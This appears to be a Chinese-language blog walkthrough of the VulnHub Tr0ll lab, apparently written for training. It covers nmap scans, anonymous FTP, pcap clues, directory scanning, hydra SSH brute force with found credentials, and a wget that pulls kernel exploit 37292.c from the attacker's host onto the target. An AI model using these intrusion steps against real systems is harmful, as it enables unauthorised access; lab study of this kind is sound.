vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、寻找flag。思维导图带你清晰拿到所以flag
1、主机发现
arp-scan -l
2、端口扫描
nmap -sS -sV 192.168.66.185
nmap -sS -A -T4 -p- 192.168.66.185
nmap --script=vuln 192.168.66.185
经典扫描三件套,详细、简略包括历史漏洞都扫描一下
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
ftp-anon: Anonymous FTP login allowed (FTP code 230)22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))这里一个匿名访问,我们登录看看什么情况
账号:anonymous 这里有个文件我们下载下来是一个pcap文件,我们看看是什么情况
这里找到了一些文字,没懂,是让我们找这个东西吧
我们去看看80端口
有点抽象的,源代码什么也没有,估计是其他文件了
爷笑了,好像在耍我
3、目录扫描
gobuster dir -u http://192.168.66.187:80 -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
dirsearch -u http://192.168.66.187:80/ -e * -i 200
nikto -h 192.168.66.187 -p 80
4、寻找突破口
我们根据pacp文件里面观察到他好像开了一个监听
这里有一种思路就是跟着pacp文件走,就是他干了什么我们跟着做或许有收获,当然是因为80端口没信息,可能是兔子窝
这里像敲门啊,这么多端口
这里后来看了wp次啊知道,这东西是访问端口,前四位是ip,第五位乘256加上第六位就是访问的端口
这里其实我们早就找到了这个东西,哪就尝试爆破或者ssh之类的尝试一下
这里我们把这个目录下文件下载下来可以执行,然后多出了一个目录,我们再次访问
两个文件夹,我们看看有什么信息
因该是ssh账户,一会儿hydra爆一下
这里是密码,爆破一下吧
hydra -L 1.txt -P /usr/share/wordlists/rockyou.txt 192.168.66.187 ssh
这里可以更改一下字典了,因为他都给我们写出来了hydra -L user.txt -P passwd.txt 192.168.66.187 ssh
爷笑了,他说绝对不是gen哪个密码,靶机最怕这个,谁知道藏了什么东西
账户: maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
密码: Good_job_:)
这里给爷整笑了,说是包含密码,结果密码是Pass.txt
5、ssh连接
连接一下ssh ssh overflow@192.168.66.187
查看系统内核和版本信息
uname -a lsb_release -a
6、寻找exp
查看一下如何使用
我们先把这个exp传输到靶机中
wget http://192.168.66.129/37292.c
这张图片是一个wp中的写的,这种图片确实思路更清晰,下次我也要试试这种思维导图
丝滑小连招拿下flag 后续我也会出更多打靶文章,希望大家关注!谢谢